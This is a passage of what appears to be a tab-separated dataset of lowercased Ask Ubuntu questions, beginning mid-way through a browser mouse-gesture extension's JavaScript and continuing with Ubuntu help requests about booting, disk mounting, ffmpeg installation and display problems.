dommousescroll '' , this , true ) ; if ( this._rockergestureenabled ) this._drawarea.addeventlistener ( `` click '' , this , true ) ; if ( recogit.browser.firefox ) { var tabbrowser = this._drawarea.ownerdocument.getbindingparent ( this._drawarea ) ; if ( tabbrowser & & tabbrowser.localname == `` tabbrowser '' ) { tabbrowser.mstrip.removeeventlistener ( `` dommousescroll '' , this._wheelontabbar , true ) ; if ( recogit.getpref ( `` tabwheelgesture '' ) ) tabbrowser.mstrip.addeventlistener ( `` dommousescroll '' , this._wheelontabbar , true ) ; } } if ( this._triggerbutton == 1 ) { //todo : /* var prefsvc = components.classes [ `` @ mozilla.org/preferences-service ; 1 '' ] .getservice ( components.interfaces.nsiprefbranch2 ) .queryinterface ( components.interfaces.nsiprefservice ) ; prefsvc.setboolpref ( `` middlemouse.contentloadurl '' , false ) ; */ } } , _state : this.state_ready , _ismousedownl : false , _ismousedownm : false , _ismousedownr : false , _suppresscontext : false , _shouldfirecontext : false , handleevent : function fgh_handleevent ( event ) { switch ( event.type ) { case `` mousedown '' : if ( event.button == 0 ) { var targetname = event.target.localname.touppercase ( ) ; if ( targetname == `` input '' || targetname == `` textarea '' ) { break ; } if ( recogit.browser.firefox ) { targetname = event.originaltarget.localname ; if ( targetname == `` scrollbarbutton '' || targetname == `` slider '' || targetname == `` thumb '' ) { break ; } } this._ismousedownl = true ; this._ismousedownm = false ; if ( this._triggerbutton == 0 & & ! this._ismousedownm & & ! this._ismousedownr & & ! this._altkey ( event ) ) { this._state = this.state_gesture ; this._startgesture ( event ) ; if ( this._mousegestureenabled ) event.preventdefault ( ) ; } else if ( this._rockergestureenabled & & this._ismousedownr ) { this._state = this.state_rocker ; // rocker-left this._invokeextragesture ( event , recogit.feature_rocker , `` 20 '' ) ; } } else if ( event.button == 1 ) { this._ismousedownm = true ; if ( this._triggerbutton == 1 & & ! this._ismousedownl & & ! this._ismousedownr & & ! this._altkey ( event ) ) { this._state = this.state_gesture ; this._startgesture ( event ) ; event.stoppropagation ( ) ; } } else if ( event.button == 2 ) { var targetname = event.target.localname.touppercase ( ) ; if ( targetname == `` object '' || targetname == `` embed '' ) { break ; } this._ismousedownr = true ; this._ismousedownm = false ; this._suppresscontext = false ; this._enablecontextmenu ( true ) ; if ( this._triggerbutton == 2 & & ! this._ismousedownl & & ! this._ismousedownm & & ! this._altkey ( event ) ) { this._state = this.state_gesture ; this._startgesture ( event ) ; } else if ( this._rockergestureenabled & & this._ismousedownl ) { this._state = this.state_rocker ; // rocker-right this._invokeextragesture ( event , recogit.feature_rocker , `` 02 '' ) ; } else { dump ( `` no capt `` + this._triggerbutton + '' `` ) ; } } break ; case `` mousemove '' : if ( this._state == this.state_gesture || this._state == this.state_keypress ) { if ( this._mousegestureenabled ) { if ( this._keypressgestureenabled & & ( event.ctrlkey || event.shiftkey ) ) { var type = this._state == this.state_gesture ? `` keypress-start '' : `` keypress-progress '' ; this._state = this.state_keypress ; //todo : this._invokeextragesture ( event , type ) ; } this._progressgesture ( event ) ; } } else if ( this._state == this.state_wheel || this._state == this.state_rocker ) { this._lastx = event.screenx ; this._lasty = event.screeny ; if ( math.abs ( this._lastx - this._lastextrax ) > 10 || math.abs ( this._lasty - this._lastextray ) > 10 ) { this._stopgesture ( ) ; } } break ; case `` mouseup '' : if ( event.button == 0 ) this._ismousedownl = false ; else if ( event.button == 1 ) this._ismousedownm = false ; else if ( event.button == 2 ) this._ismousedownr = false ; if ( ! this._ismousedownl & & ! this._ismousedownm & & ! this._ismousedownr ) { if ( this._state == this.state_keypress ) { this._state = this.state_ready ; //todo : if ( event.ctrlkey ) this._invokeextragesture ( event , `` keypress-ctrl '' ) ; else if ( event.shiftkey ) this._invokeextragesture ( event , `` keypress-shift '' ) ; this._invokeextragesture ( event , `` keypress-stop '' ) ; } this._stopgesture ( event ) ; if ( this._shouldfirecontext ) { this._shouldfirecontext = false ; this._displaycontextmenu ( event ) ; } } break ; case `` contextmenu '' : if ( ! this._ismousedownl & & this._ismousedownr ) { this._suppresscontext = true ; this._shouldfirecontext = true ; } if ( event.button == 0 ) { this._enablecontextmenu ( true ) ; } if ( this._suppresscontext ) { this._suppresscontext = false ; event.preventdefault ( ) ; event.stoppropagation ( ) ; this._enablecontextmenu ( false ) ; } break ; case `` dommousescroll '' : if ( this._state == this.state_gesture || this._state == this.state_wheel ) { this._state = this.state_wheel ; // wheel-up / wheel-down this._invokeextragesture ( event , recogit.feature_wheel | this._pressedbutton , event.detail < 0 ? `` u '' : `` d '' ) ; event.preventdefault ( ) ; event.stoppropagation ( ) ; } break ; case `` click '' : if ( this._state == this.state_rocker ) { event.preventdefault ( ) ; event.stoppropagation ( ) ; } break ; case `` draggesture '' : if ( this._state ! = this.state_rocker ) this._ismousedownl = false ; break ; } } , _altkey : function ( event ) { return this._suppressalt ? event.altkey : false ; } , _displaycontextmenu : function fgh__displaycontextmenu ( event ) { with ( this._drawarea.ownerdocument.defaultview ) { if ( ! nscontextmenu.prototype._settargetinternal ) { nscontextmenu.prototype._settargetinternal = nscontextmenu.prototype.settarget ; nscontextmenu.prototype.settarget = function ( anode , arangeparent , arangeoffset ) { this._settargetinternal ( anode , arangeparent , this._rangeoffset ) ; } ; } nscontextmenu.prototype._rangeoffset = event.rangeoffset ; } this._enablecontextmenu ( true ) ; var evt = event.originaltarget.ownerdocument.createevent ( `` mouseevents '' ) ; evt.initmouseevent ( `` contextmenu '' , true , true , event.originaltarget.ownerdocument.defaultview , 0 , event.screenx , event.screeny , event.clientx , event.clienty , false , false , false , false , 2 , null ) ; event.originaltarget.dispatchevent ( evt ) ; } , _enablecontextmenu : function fgh__enablecontextmenu ( aenable ) { if ( recogit.browser.chrome ) { return ; } var elt = this._drawarea.ownerdocument.getelementbyid ( `` contentareacontextmenu '' ) ; if ( ! elt ) elt = this._drawarea.ownerdocument.getelementbyid ( `` viewsourcecontextmenu '' ) ; if ( ! elt ) return ; if ( aenable ) elt.removeattribute ( `` hidden '' ) ; else elt.setattribute ( `` hidden '' , `` true '' ) ; } , _wheelontabbar : function fgh__wheelontabbar ( event ) { var tabbar = null ; if ( event.target.localname == `` tab '' ) tabbar = event.target.parentnode ; else if ( event.target.localname == `` tabs '' & & event.originaltarget.localname ! = `` menuitem '' ) tabbar = event.target ; else return ; event.preventdefault ( ) ; event.stoppropagation ( ) ; tabbar.advanceselectedtab ( event.detail < 0 ? -1 : 1 , true ) ; } , _startgesture : function fgh__startgesture ( event ) { this.sourcenode = event.target ; this._lastx = event.screenx ; this._lasty = event.screeny ; this._directionchain = `` '' ; this._shouldfirecontext = false ; /* if ( this._trailenabled ) this.createtrail ( event ) ; */ //note : chrome ã§ input ãªã©ã®å³ã‚¯ãƒªãƒƒã‚¯ãƒ¡ãƒ‹ãƒ¥ãƒ¼ã€œãƒšãƒ¼ã‚¹ãƒˆã€ãœåš¹ã‹ãªããªã‚‹ã®ã§ã€ // canvas ã‚’ä½œã‚‹ã®ã¯ progressgesture ã§ //if ( this._trailenabled ) { // } //new : this._pressedbutton = event.button ; // } , //new : _createcontext : function ( event , feature , stroke ) { // gestureutils ã‚’ãƒ¡ãƒ³ãƒã¨ã—ã¦åˆ©ç”¨å¯èƒ½ã« var f = function ( ) { } ; if ( `` gestureutils '' in recogit ) { f.prototype = recogit.gestureutils ; } var context = new f ( ) ; var obj = { event : event , feature : feature , stroke : stroke , sourcenode : this.sourcenode , lastx : this._lastx , lasty : this._lasty } ; // extend for ( var property in obj ) { context [ property ] = obj [ property ] ; } var self = this ; context.cancel = function ( ) { self._directionchain = `` '' ; self._stopgesture ( ) ; } ; return context ; } , _progressgesture : function fgh__progressgesture ( event ) { var x = event.screenx ; var y = event.screeny ; var dx = math.abs ( x - this._lastx ) ; var dy = math.abs ( y - this._lasty ) ; if ( dx < 10 & & dy < 10 ) return ; var direction ; if ( dx > dy ) direction = x < this._lastx ? `` l '' : `` r '' ; else direction = y < this._lasty ? `` u '' : `` d '' ; /* if ( this._trailenabled ) this.drawtrail ( this._lastx , this._lasty , x , y ) ; */ if ( this._trailenabled ) { if ( this._trail & & this._trail.available ( ) ) { this._trail.draw ( event.clientx , event.clienty ) ; } else { //note : chrome ã®å ´åˆã€ãƒˆãƒ¬ã‚¤ãƒ«ã‚’æãã¨ãƒ†ã‚­ã‚¹ãƒˆã®é¸æšžãœè§£é™¤ã•ã‚œã‚‹ã‚ˆã†ãªã®ã§ if ( ! recogit.browser.chrome || window.getselection ( ) .tostring ( ) .length == 0 ) { this._trail = new recogit.trail ( ) ; this._trail.create ( recogit.getbrowserdocument ( ) , event.clientx , event.clienty ) ; } } } this._lastx = x ; this._lasty = y ; if ( this._state == this.state_keypress ) return ; var lastdirection = this._directionchain.charat ( this._directionchain.length - 1 ) ; if ( direction ! = lastdirection ) { this._directionchain += direction ; this._gestureobserver.ondirectionchanged ( this._createcontext ( event , recogit.feature_gesture | this._pressedbutton , this._directionchain ) ) ; } /* if ( this._gesturetimeout > 0 ) this._settimeout ( this._gesturetimeout ) ; */ } , _invokeextragesture : function fgh__invokeextragesture ( event , feature , stroke ) { if ( this._state == this.state_wheel || this._state == this.state_rocker ) { this._lastextrax = event.screenx ; this._lastextray = event.screeny ; } if ( this._state ! = this.state_keypress & & this._trailenabled ) { //this.erasetrail ( ) ; if ( this._trail ) { this._trail.erase ( ) ; } } if ( ! this.sourcenode ) this.sourcenode = event.target ; this._gestureobserver.onextragesture ( this._createcontext ( event , feature , stroke ) ) ; this._suppresscontext = true ; this._shouldfirecontext = false ; this._directionchain = `` '' ; /* if ( this._state == this.state_wheel || this._state == this.state_rocker ) { if ( this._gesturetimeout > 0 ) this._settimeout ( this._gesturetimeout ) ; } */ } , _stopgesture : function fgh__stopgesture ( event ) { this._state = this.state_ready ; this._ismousedownl = false ; this._ismousedownm = false ; this._ismousedownr = false ; if ( this._trailenabled ) { //this.erasetrail ( ) ; if ( this._trail ) { this._trail.erase ( ) ; } } if ( this._directionchain ) { this._gestureobserver.onmousegesture ( this._createcontext ( event , recogit.feature_gesture | this._pressedbutton , this._directionchain ) ) ; this._suppresscontext = true ; this._shouldfirecontext = false ; } this.sourcenode = null ; this._directionchain = `` '' ; this._cleartimeout ( ) ; } , observe : function fgh_observe ( asubject , atopic , adata ) { if ( atopic == `` nspref : changed '' ) this._reloadprefs ( ) ; } , _gesturetimer : null , /* _settimeout : function fgh__settimeout ( amsec ) { this._cleartimeout ( ) ; this._gesturetimer = components.classes [ `` @ mozilla.org/timer ; 1 '' ] .createinstance ( components.interfaces.nsitimer ) ; this._gesturetimer.initwithcallback ( this , amsec , components.interfaces.nsitimer.type_one_shot ) ; } , */ _cleartimeout : function fgh__cleartimeout ( ) { if ( this._gesturetimer ) { this._gesturetimer.cancel ( ) ; this._gesturetimer = null ; } } , notify : function ( atimer ) { this._suppresscontext = true ; this._shouldfirecontext = false ; this._directionchain = `` '' ; this._stopgesture ( ) ; this._gestureobserver.onextragesture ( null , `` gesture-timeout '' ) ; } , _traildot : null , _trailarea : null , _traillastdot : null , _trailoffsetx : 0 , _trailoffsety : 0 , _trailzoom : 1 , createtrail : function fgh_createtrail ( event ) { var doc ; // chrome ã® iframe ã®ä¸šã§ãšã‹ã—ããªã‚‹ /* //note : components.interfaces.nsidomhtmldocument ã‹ã‚‰å¤‰æ›´ if ( event.view.top & & event.view.top.document instanceof htmldocument ) doc = event.view.top.document ; else if ( event.view.document instanceof htmldocument ) doc = event.view.document ; else return ; */ doc = recogit.getbrowserdocument ( ) ; var insertionnode = doc.documentelement ? doc.documentelement : doc ; //edit : doc.getboxobjectfor ã¯2009å¹´é ƒã«å‰šé™¤ã•ã‚œãÿã‚ˆã†ãªã®ã§ä¸è¦ã£ã½ã„ this._trailzoom = recogit.getzoomratio ( doc ) ; this._trailoffsetx = ( win.mozinnerscreenx - win.scrollx ) * this._trailzoom ; this._trailoffsety = ( win.mozinnerscreeny - win.scrolly ) * this._trailzoom ; this._trailarea = doc.createelementns ( this.html_ns , `` xdtrailarea '' ) ; insertionnode.appendchild ( this._trailarea ) ; this._traildot = doc.createelementns ( this.html_ns , `` xdtraildot '' ) ; this._traildot.style.width = this._trailsize + `` px '' ; this._traildot.style.height = this._trailsize + `` px '' ; this._traildot.style.background = this._trailcolor ; this._traildot.style.border = `` 0px '' ; this._traildot.style.position = `` absolute '' ; this._traildot.style.zindex = 2147483647 ; } , drawtrail : function fgh_drawtrail ( x1 , y1 , x2 , y2 ) { if ( ! this._trailarea ) return ; var xmove = x2 - x1 ; var ymove = y2 - y1 ; var xdecrement = xmove < 0 ? 1 : -1 ; var ydecrement = ymove < 0 ? 1 : -1 ; x2 -= this._trailoffsetx ; y2 -= this._trailoffsety ; if ( math.abs ( xmove ) > = math.abs ( ymove ) ) for ( var i = xmove ; i ! = 0 ; i += xdecrement ) this._strokedot ( x2 - i , y2 - math.round ( ymove * i / xmove ) ) ; else for ( var i = ymove ; i ! = 0 ; i += ydecrement ) this._strokedot ( x2 - math.round ( xmove * i / ymove ) , y2 - i ) ; } , erasetrail : function fgh_erasetrail ( ) { if ( this._trailarea & & this._trailarea.parentnode ) { while ( this._trailarea.lastchild ) this._trailarea.removechild ( this._trailarea.lastchild ) ; this._trailarea.parentnode.removechild ( this._trailarea ) ; } this._traildot = null ; this._trailarea = null ; this._traillastdot = null ; } , _strokedot : function fgh__strokedot ( x , y ) { if ( this._trailarea.y == y & & this._trailarea.h == this._trailsize ) { var newx = math.min ( this._trailarea.x , x ) ; var neww = math.max ( this._trailarea.x + this._trailarea.w , x + this._trailsize ) - newx ; this._trailarea.x = newx ; this._trailarea.w = neww ; this._traillastdot.style.left = newx.tostring ( ) + `` px '' ; this._traillastdot.style.width = neww.tostring ( ) + `` px '' ; return ; } else if ( this._trailarea.x == x & & this._trailarea.w == this._trailsize ) { var newy = math.min ( this._trailarea.y , y ) ; var newh = math.max ( this._trailarea.y + this._trailarea.h , y + this._trailsize ) - newy ; this._trailarea.y = newy ; this._trailarea.h = newh ; this._traillastdot.style.top = newy.tostring ( ) + `` px '' ; this._traillastdot.style.height = newh.tostring ( ) + `` px '' ; return ; } if ( this._trailzoom ! = 1 ) { x = math.floor ( x / this._trailzoom ) ; y = math.floor ( y / this._trailzoom ) ; } var dot = this._traildot.clonenode ( true ) ; dot.style.left = x + `` px '' ; dot.style.top = y + `` px '' ; this._trailarea.x = x ; this._trailarea.y = y ; this._trailarea.w = this._trailsize ; this._trailarea.h = this._trailsize ; this._trailarea.appendchild ( dot ) ; this._traillastdot = dot ; } , } ; so any pointers how to fix this issue .
521070	installed ubuntu with usb on windows 7 pc , doesnt boot to ubuntu , bios doensnt see usb stick anymore	i installed ubuntu using a usb stick ( followed ubuntu installation instructions for usb using uui ) on an existing windows 7 pc . i used an old unused partition ( which had an old fedora distro ) it installed successfully . after restart , it booted directly to windows 7 . i was trying to follow instructions from here ( samsung rc418 still boots into windows after installation of ubuntu ) as it seemed similar but when i go into my bios , now i can not see the ubuntu usb stick to choose as a boot option . i dont necessarily care about the usb stick not found by the bios , if i can get to the boot up option menu . ( also , in windows system configuration for startup , i dont see ubuntu , the only option is windows 7 ) any ideas ?
521073	please please please help me !	when i login using my user account with the correct password , it brings me back to the login screen . i cant even access my guest account ( i 'm using my phone right now )
521074	unabel to open another hdd with ubuntu 14.04	i 'm new to ubuntu . i have installed windows 8.1 next to ubuntu 14.04 , on one hdd . this first hdd working fine , i can access to my windows file etc . but i have another hdd named `` maya '' where i have just some movies , music ... .. all dumped there from windows . i need to get to that hdd from ubuntu too but when i try it i get this error : error mounting /dev/sdb2 at /media/patrik/maya : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/patrik/maya '' ' exited with non-zero exit status 12 : failed to read last sector ( 625135615 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdb2 ' : invalid argument the device '/dev/sdb2 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? i tried to set that disk as shared in windows but nothing has changed . please , before you start with some answers remember i 'm copletely new to linux systems .
521076	system requirements for installing kubuntu 14.04	what are the minimum system requirements for installing kubuntu 14.04 lts ?
521077	what are the specifications a mount command provide ?	while reading about linux i got the following.. typing mount without any arguments will show all presently mounted filesystems . when i tried this on my system , i got.. anupam @ jazz : ~ $ mount /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) selinuxfs on /sys/fs/selinux type selinuxfs ( rw , relatime ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=anupam ) /dev/sda2 on /media/anupam/1c44cc1044cbea9a type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) well , i get that everything before on is a device node and after that is a mount point , but i am not getting some of the types . are these types of file systems like ext4 , ext3 , btrfs , xfs - because at /dev/sda5 its type is ext4 ( which is file system for linux ) , but for /dev/sda2 ( which is c : \ of windows 8 ) it is showing fuseblk ( but file system for it is ntfs ) . and `parameters ( rw , noexec , nosuid , nodev etc. ) related to these types , , can someone please give me a quick reference to get all of these ,
521082	utorrent on startup	i have installed utorrent like is shown in the link . http : //www.sysads.co.uk/2014/05/install-utorrent-3-3-ubuntu-14-04-13-10/ every thing went smooth . after that i have add to the startup app comand utserver -settingspath /opt/utorrent-server-alpha-v3_3/ now when i startup pc just need to went to localhost:8080/gui and provide user name : admin i have installed both firefox and chromium , but i always use firefox for my internet . i want to add command to the startup that will lunch minimazed chromium with utorrent that will automatic add username admin and timeout around 10 seconds . : ~ $ chromium-browser localhost:8080/gui/ i know to do that but , how to add username admin , timeout 10s and minimazed ( -m )
521083	how to boot usb from gnu grub 2.02~beta2-9ubuntu1 ?	i am using hp 1000-notebook pc corei-3 series . i had installed ubuntu 14.04.1-desktop-amd64 , accidentally using the lvm option . after finding my 500 gb hard drive stuck in lvm i started to find methods/gui software to resize it . in the mean time my brother while trying to install windows 7 has deleted the lvm partition . now i 've nothing on my pc except gnu grub version 2.02~beta2-9ubuntu1 command line . i 've tried to reinstall ubuntu using a bootable usb but it is not booting . is there any command for booting usb from gnu grub which says , `` minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . ''
521084	bash script for multiple tabs program running	i have the following bash script code to open multiple session of a python script with different input argument in different terminal tabs . # ! /bin/bash cd /home/me/experiment tab= '' -- tab-with-profile=default '' options= ( ) # ( -- tab -- title=terminal ) cmds [ 1 ] = '' ./new_path.py -s 593000 -f 593200 '' titles [ 1 ] = '' 0593000_0593200 '' cmds [ 2 ] = '' ./new_path.py -s 593200 -f 593400 '' titles [ 2 ] = '' 0593200_0593400 '' cmds [ 3 ] = '' ./new_path.py -s 593400 -f 593600 '' titles [ 3 ] = '' 0593400_0593600 '' cmds [ 4 ] = '' ./new_path.py -s 593600 -f 593800 '' titles [ 4 ] = '' 0593600_0593800 '' cmds [ 5 ] = '' ./new_path.py -s 593800 -f 594000 '' titles [ 5 ] = '' 0593800_0594000 '' for i in 1 2 3 4 5 ; do options+= ( $ tab -- title= '' $ { titles [ i ] } '' -e `` bash -c \ '' $ { cmds [ i ] } ; bash\ '' '' ) done gnome-terminal `` $ { options [ @ ] } '' exit 0 how can i avoid typing the same command multiple times using for loop and bash script variable ?
521087	file lost when move file over network via terminal	ubuntu version = 12.04 lts system memory = 7gb free of 16gb running on raid 1+0 i 'm trying to move files from local drive to a mounted cifs folder ( shared by a windows 7 pro sp1 pc ) , using this command : sudo mv [ folder ] /mnt/pc it gives an error `` can not allocate memory '' , then all my source files are gone ! the mountpoint /mnt/pc folder also disappeared ( not hide ) . i could not mount it back again until i restart the server service in windows 7 pro pc , and create a new mount point folder . i have tried unmount the /mnt/pc folder right away it failed , and enable show hidden files , but i could not find my files either in the source folder nor this folder . here 's my entry in //192.168.1.202/pc /mnt/pc cifs defaults , _netdev , credentials=/home/user/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 0 0 why my files are gone and most importantly how could i retrieve it back ? after some google , found someone suggest adding sec=ntlm to the parameter . i then mount the network shared folder again , and try copy local file to it again via sudo pcmanfm this time . however , i still get error when doing copy & paste . the file i 'm trying to copy consist of multiple size , some are 3.5gb , small one could be just a few kb ( documents ) . added : [ some helpful info ] system running on software raid10 , wd re4 sata 2tb . hdd is healthy , mdadm status show clean & superblock is persistent . all hdd active . the files i lost is around 145gb++ , disappeared right away the error message pop up . i did not notice the system free space before the files lost , but if not mistaken the space does free up space equal to that amount after they disappeared .
521088	xfce does n't display menu	i have lost controll over the workspace , the icons on the left have dissapered , i am unable to change the background and rightclicking mouse on screen dos'nt work eighter . i was trying to put some books on my ipad , it failed - books are there but they dont show up on bookshelf . after rebooting ( trying to get calibre to catch the ipad ) the background image showed at login screen , but disapered when loging in - replaced with some big pixelated garbage . loging in as gues , everything worked , and i could change background and interact with the screen -- rebooting and loging in as my self left the background picture , but the rest is still absent . which local settings should i correct ? or reinstall which packages ? i use ubuntu studio 64 on a dell latitude .
521090	change background of encryption password loadup screen	i 'm looking projects for things involved in ubuntu . i find the environment of the screen to which you give your full disk encryption passphrase to be bland and would love to change it . is this an editable feature and what other fun projects do you have in mind that i could try my hand at .
521091	grub is not responding . can not do anything but shut down my pc manually !	so i updated ubuntu.after the completion of the update , it asked for a reboot and so i did . but once it rebooted , i was unable to select anything from the two oses i have ( win 7 and ubuntu ) .it does n't even boot automatically into ubuntu as it used to do . i can not use arrow keys or enter key or anything else.i waited for 10 mins and nothing happened . so i have to just shut down my laptop using the power button .
521093	hp 510 microphone is not working	this notebook is really old and i decided to install lubuntu 14.04.1 here.everything is more than better , but i have a problem with the microphone . i already install pulseaudio and tried a ton of things , but still not working . please for help to solve this problem .
521095	home partition in ubuntu 14.04	if i partition my home drive in recovery mode ( ubuntu 14.04 ) , will my os get formated ?
521097	there was an error playing video from the webcam	cheese is working nice for taking photos , but i can not take video in that , it is showing this error `` there was an error playing video from the webcam ''
521098	connecting to ubuntu using from galaxy tablet via 3g	i have dell inspiron where i have installed ubuntu 14.04 lts and i do internet using usb huawei e352 dongle in that pc . other side i have samsung galaxy tab 3 ( sm-t211 ) with 3g enabled using micro sim . i wanted to do ssh from my tab to pc using gprs or 3g using any android app ( juicessh ) it does not connect and it ask for retry again and again . please someone help so that i can connect to my pc from tab . thanks rabi
521099	weird system halt , ugly glitches	after automatic system update on ubuntu 14.04 actually i did n't do anything . after update ubuntu asked me reboot and i did . now even my bios menu have graphic gliches , and i can not boot to usb ( its like first screenshot again ) now i cant event boot to windows install usb stick , graphic glitches everywhere is it fixable ? or it destroyed my gpu or cpu ? here 's a screenshot showing some screen glitches : and here 's another , showing similar but different glitches ( on the screen that shows the grub menu ) :
521100	ubuntu display problem	i have the same problem on ubuntu and ubuntu gnome 14.04 lts i have lg 22m35 screen which is big 22 inch screen when i start the pc it boots fine till login screen in ubuntu gnome on login screen it just shows gray background and nothing else but if i move the mouse it shows the cursor also i am able to login into it by typing enter password enter after that if i take screenshot it looks like this as you can see in the screen shot its two displays and actually there is only one , if i disable the default display it seems fine but everytime i restart i have to disable it and the login problem is insane any one other then me ca n't figureout how to login to my pc .
521101	how can i change the resolution seen by a bootloader in virtualbox ?	i am using virtualbox 4.3 to take screenshots of various ubuntu installer bootloader screens , and i would like to decrease the number of rows and columns that the bootloader renders to . since the os is n't loaded at this point , i can neither install nor use the virtualbox guest additions . is there a way to change the resolution presented the virtual machine at this point ? if it makes a difference , i am only concerned with ( virtual ) efi booting .
521102	what does device node 'none ' means in file system ?	when i tried $ mount command on my system ( 14.04 lts ) , i found some of the results like ... none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) i am not getting this file system or device node none is mounted on multiple mount points like ( /sys/fs/cgroup , /sys/kernel/security , /run/shm etc ) .. does it infer there is nothing or is it a file system or device node.. ?
521105	is the `` affects me '' button in launchpad gone ?	until some time ago there 's been a button labeled `` affects me too '' which one could press . the last time i saw it might be some months ago and i did n't check inbetween . i no longer see it , e.g . for https : //bugs.launchpad.net/bugs/919801 . is it gone ? if yes , why ?
521108	problem in installing ffmpeg in ubuntu 14.04	i try to install ffmpeg in unbutu according to https : //trac.ffmpeg.org/wiki/compilationguide/ubuntu i create a shell file with below code sudo apt-get update sudo apt-get -y install autoconf automake build-essential libass-dev libfreetype6-dev libgpac-dev \ libsdl1.2-dev libtheora-dev libtool libva-dev libvdpau-dev libvorbis-dev libx11-dev \ libxext-dev libxfixes-dev pkg-config texi2html zlib1g-dev mkdir ~/ffmpeg_sources cd ~/ffmpeg_sources wget http : //download.videolan.org/pub/x264/snapshots/last_x264.tar.bz2 tar xjvf last_x264.tar.bz2 cd x264-snapshot* path= '' $ path : $ home/bin '' ./configure -- prefix= '' $ home/ffmpeg_build '' -- bindir= '' $ home/bin '' -- enable-static -- disable-opencl path= '' $ path : $ home/bin '' make make install make distclean sudo apt-get install unzip cd ~/ffmpeg_sources wget -o fdk-aac.zip https : //github.com/mstorsjo/fdk-aac/zipball/master unzip fdk-aac.zip cd mstorsjo-fdk-aac* autoreconf -fiv ./configure -- prefix= '' $ home/ffmpeg_build '' -- disable-shared make make install make distclean cd ~/ffmpeg_sources wget http : //ffmpeg.org/releases/ffmpeg-snapshot.tar.bz2 tar xjvf ffmpeg-snapshot.tar.bz2 cd ffmpeg path= '' $ path : $ home/bin '' pkg_config_path= '' $ home/ffmpeg_build/lib/pkgconfig '' ./configure \ -- prefix= '' $ home/ffmpeg_build '' \ -- extra-cflags= '' -i $ home/ffmpeg_build/include '' \ -- extra-ldflags= '' -l $ home/ffmpeg_build/lib '' \ -- bindir= '' $ home/bin '' \ -- enable-libfdk-aac \ -- enable-libx264 \ path= '' $ path : $ home/bin '' make make install make distclean hash -r ( i add execution permission to this file ) and in command line run ./mybashfile.sh ) it run correctly and start to download but some last line of terminal output is . . . rm -f libmpegtpenc/src/.dirstamp rm -f libpcmutils/src/.deps/.dirstamp rm -f libpcmutils/src/.dirstamp rm -f libsbrdec/src/.deps/.dirstamp rm -f libsbrdec/src/.dirstamp rm -f libsbrenc/src/.deps/.dirstamp rm -f libsbrenc/src/.dirstamp rm -f libsys/src/.deps/.dirstamp rm -f libsys/src/.dirstamp rm -f libtool config.lt rm -f tags id gtags grtags gsyms gpath tags rm -f cscope.out cscope.in.out cscope.po.out cscope.files rm -f config.status config.cache config.log configure.lineno config.status.lineno rm -rf ./.deps libaacdec/src/.deps libaacenc/src/.deps libfdk/src/.deps libmpegtpdec/src/.deps libmpegtpenc/src/.deps libpcmutils/src/.deps libsbrdec/src/.deps libsbrenc/src/.deps libsys/src/.deps rm -f makefile -- 2014-09-07 15:18:35 -- http : //ffmpeg.org/releases/ffmpeg-snapshot.tar.bz2 resolving ffmpeg.org ( ffmpeg.org ) ... 192.190.173.45 connecting to ffmpeg.org ( ffmpeg.org ) |192.190.173.45|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : ‘ffmpeg-snapshot.tar.bz2’ [ < = > ] 13 -- .-k/s in 0s 2014-09-07 15:18:45 ( 1.30 mb/s ) - ‘ffmpeg-snapshot.tar.bz2’ saved [ 13 ] bzip2 : ( stdin ) is not a bzip2 file . tar : child returned status 2 tar : error is not recoverable : exiting now ./install-ffmpeg.sh : line 31 : cd : ffmpeg : no such file or directory ./install-ffmpeg.sh : line 32 : ./configure : no such file or directory make : *** no rule to make target `install ' . stop . make : *** no rule to make target `distclean ' . stop . where is the problem ? and how can i install ffmpeg correctly ?
521110	installation - `` something else '' option is missing	i need to dualboot ubuntu with existing windows 7 . installation guides all over the internet look pretty easy but my notebook decided not to go along with them . when i should choose the option `` something else '' to create respective linux partitions , the screen is empty - look at the screenshot : https : //drive.google.com/file/d/0b5lxb9pf51xkwg1mmnd1exvfx0k/edit ? usp=sharing any ideas what to do ? should i create the partitions in gparted at first ? however , it looks weird that it does n't recognize even any win 7 partition . btw . i have hybrid ssd+hdd with preinstalled win 7 ( ssd runs in caching mode ) if it 's important to know . many thanks , jakub
